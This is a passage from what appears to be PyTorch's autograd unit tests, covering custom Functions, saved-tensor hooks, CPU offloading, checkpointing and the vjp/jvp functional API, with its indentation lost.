return z * (y_p * x_t + x_p * y_t)
@staticmethod
def vjp(ctx, grad_out):
x, y = ctx.saved_tensors
z = ctx.z
return z * grad_out * y, z * grad_out * x, None
a = torch.tensor(1., requires_grad=True, dtype=torch.double)
t = torch.tensor(1., dtype=torch.double)
b = torch.tensor(2., requires_grad=True, dtype=torch.double)
c = 4
with fwAD.dual_level():
a_dual = fwAD.make_dual(a, t)
out = Func.apply(a_dual, b, c)
out.backward()
gradcheck(Func.apply, (a, b, c), check_forward_ad=True)
# When saved for backward, but not saved for forward
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x: torch.Tensor):
ctx.save_for_backward(x)
return x.clone()
@staticmethod
def jvp(ctx, x_t):
self.assertEqual(len(ctx.saved_tensors), 0)
return x_t
@staticmethod
def vjp(ctx, grad_out):
x, = ctx.saved_tensors
self.assertEqual(len(ctx.saved_tensors), 1)
return grad_out
with fwAD.dual_level():
a_dual = fwAD.make_dual(a, t)
out = Func.apply(a_dual)
out.backward()
gradcheck(Func.apply, (a,), check_forward_ad=True)
def test_custom_function_local_inplace(self):
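# An in-place op inside forward on a locally created view (not an input) should not change
# how the backward node is built; the grad_fn class name is MyFnBackward either way.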
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
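# Ops with integer outputs (argmax, argsort, searchsorted, bucketize, unique, ...) must
# never report requires_grad=True, even when their inputs do.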
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
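# Builds a reference cycle output -> metadata dict -> ctx and checks that,
# with gc disabled, the output stays alive, and that gc.collect() can break
# the cycle whether or not backward() has been called.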
def test_custom_function_cycle(self):
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
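# grad_fn._saved_self / _saved_other return the original tensor object when the
# saved tensor is an input to the op, but only an equal (re-wrapped) tensor when
# it is an output of the op; accessing them after backward() must raise.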
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
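# The tensor returned by _saved_result shares its version counter with the
# original, so an in-place update made under no_grad is reflected in both.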
def test_saved_variable_version_counter(self):
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def test_saved_variable_packing_unpacking_saved_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
def test(get_input, is_leaf):
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x / 2)
self.assertEqual(a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(2 * a, a.grad)
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x)
self.assertEqual(2 * a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(3 * a, a.grad)
# double backward
a = get_input()
grad_fn = a.grad_fn
y = a ** 3
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
g.sum().backward()
else:
g.sum().backward()
self.assertEqual(6 * a, a.grad)
a = get_input()
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: 1)
with self.assertRaisesRegex(TypeError, "Output of saved tensor unpack_hook expected to be a Tensor"):
print(y.grad_fn._saved_self)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: x, lambda x: x)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: (x, b), lambda x: x)
def inplace_double(x):
x *= 2
return x
a = get_input()
t = a * a
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
t.grad_fn._raw_saved_self.register_hooks(inplace_double, lambda x: x / 2)
# leaf
test(lambda: torch.randn(5, requires_grad=True), True)
# not leaf, not output
test(lambda: (1 + torch.randn(5, requires_grad=True)), False)
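# did_not_save_original case: for y = torch.exp(a) autograd saves the *output* y
# (accessed via _raw_saved_result), unlike y = a * a above where the input a
# itself is saved (_raw_saved_self).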
def test_saved_variable_packing_unpacking_did_not_save_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
y.grad_fn._raw_saved_result.register_hooks(lambda x: x, lambda x: x)
self.assertEqual(y, y.grad_fn._saved_result)
self.assertIs(y.grad_fn, y.grad_fn._saved_result.grad_fn)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_saved_variable_packing_unpacking_saved_original_with_default_hooks(self):
# Tests that default hooks are properly registered, used and reset
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
# See also:
# - test_saved_variable_packing_unpacking_saved_original_with_hooks
def pack(x):
warnings.warn("pack")
return x
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
a = torch.ones(5, requires_grad=True)
warnings.simplefilter('always')
with warnings.catch_warnings(record=True) as w:
y = a * a
# should raise two warnings because a is saved twice (once as self, once as other)
self.assertEqual(len(w), 2)
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x / 2):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(2 * a, y.grad_fn._saved_self)
self.assertEqual(2 * a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(4 * a, a.grad)
# The hooks were removed when the context manager exited, so saving is back to default
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_saved_variable_packing_unpacking_did_not_save_original_with_default_hooks(self):
# See also test_saved_variable_packing_unpacking_did_not_save_original_with_hooks
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
self.assertEqual(y, y.grad_fn._saved_result)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_setting_default_saved_variable_hooks_twice_should_not_fail(self):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
pass
def test_setting_default_saved_variable_hooks_twice_should_use_inner(self):
with torch.autograd.graph.saved_tensors_hooks(lambda x: 3 * x, lambda x: 3 * x):
b = torch.randn(5, requires_grad=True)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 5 * x, lambda x: 5 * x):
a = torch.randn(5, requires_grad=True)
y = a * a
z = b * b
y.sum().backward()
z.sum().backward()
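# y = a * a was saved under the inner hooks (pack and unpack both multiply by 5),
# so each saved operand unpacks as 25 * a and d(y.sum())/da = 2 * 25 * a.
# z = b * b only sees the outer hooks, giving 2 * 9 * b.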
self.assertEqual(2 * 5 * 5 * a, a.grad)
self.assertEqual(2 * 3 * 3 * b, b.grad)
def test_save_on_cpu_and_checkpoint(self):
a = torch.randn(2, 2, requires_grad=True)
b = a.pow(2).pow(2).pow(2).pow(2)
b.sum().backward()
b_grad = a.grad.clone()
a.grad.zero_()
with torch.autograd.graph.save_on_cpu():
h = a.pow(2)
h = checkpoint(lambda x: x.pow(2).pow(2), h, use_reentrant=False)
c = h.pow(2)
c.sum().backward()
c_grad = a.grad.clone()
a.grad.zero_()
def f(a):
h = a.pow(2)
with torch.autograd.graph.save_on_cpu():
h = h.pow(2).pow(2)
return h.pow(2)
d = checkpoint(f, a, use_reentrant=False)
d.sum().backward()
d_grad = a.grad.clone()
self.assertEqual(b_grad, c_grad)
self.assertEqual(b_grad, d_grad)
def test_pack_hook_with_inplace_modification_should_fail(self):
a = torch.randn(5, requires_grad=True)
def inc(x):
x += 1
return x
with torch.autograd.graph.saved_tensors_hooks(inc, lambda x: x):
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y = torch.exp(a)
y = torch.exp(a)
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y.grad_fn._raw_saved_result.register_hooks(inc, lambda x: x)
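# The pack hook may return an arbitrary Python object (here a file path);
# the unpack hook only has to turn it back into a Tensor when backward needs it.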
def test_saving_variable_to_disk(self):
with tempfile.TemporaryDirectory() as tmp_dir:
def pack(x):
name = os.path.join(tmp_dir, str(uuid.uuid4()))
torch.save(x, name)
return name
def unpack(name):
return torch.load(name)
with torch.autograd.graph.saved_tensors_hooks(pack, unpack):
a = torch.ones(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_default_saved_variable_hooks_double_backward(self):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
self.assertEqual(6 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 2 because only a is saved once
self.assertEqual(6 * 2 * a, a.grad)
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 4 because pow_backward is grad * (exp * self.pow(exp - 1))
# so grad is saved and self (i.e. a) is saved
self.assertEqual(6 * 4 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# combining the two above blocks: 2 * 4 = 8
# note that in that sense, a is saved twice
self.assertEqual(6 * 8 * a, a.grad)
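# save_on_cpu() is a built-in saved-tensors-hooks pair: packed tensors are
# offloaded to CPU (optionally into pinned memory) and restored on unpack, so
# values, dtype and layout must survive the round trip.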
def test_graph_save_on_cpu(self):
def test(get_input, cuda, pin_memory):
with torch.autograd.graph.save_on_cpu(pin_memory):
a = get_input()
if cuda:
a.cuda()
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
self.assertEqual(a.dtype, y.grad_fn._saved_self.dtype)
self.assertEqual(a.layout, y.grad_fn._saved_self.layout)
if y.is_sparse:
y = y.to_dense()
y.sum().backward()
self.assertEqual(2 * a, a.grad)
for cuda in [False] + ([True] if torch.cuda.is_available() else []):
for pin_memory in [True, False]:
# FloatTensor
test(lambda: torch.randn(5, requires_grad=True), cuda, pin_memory)
# DoubleTensor
test(lambda: torch.randn(5, requires_grad=True, dtype=torch.double), cuda, pin_memory)
# Sparse tensor
x = torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.]), requires_grad=True)
test(lambda: x, cuda, pin_memory)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_graph_save_on_cpu_cuda(self):
def f(x):
a = x + 1
return a * a
# with grad
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_grad = torch.cuda.memory_allocated()
del a
del y
# without grad
a = torch.ones(1, requires_grad=True, device="cuda")
with torch.no_grad():
y = f(a)
memory_without_grad = torch.cuda.memory_allocated()
self.assertGreater(memory_with_grad, memory_without_grad)
del a
del y
# with hooks
with torch.autograd.graph.save_on_cpu():
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_hooks = torch.cuda.memory_allocated()
self.assertEqual(memory_with_hooks, memory_without_grad)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors, or tuples of Tensors, with matching sizes
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
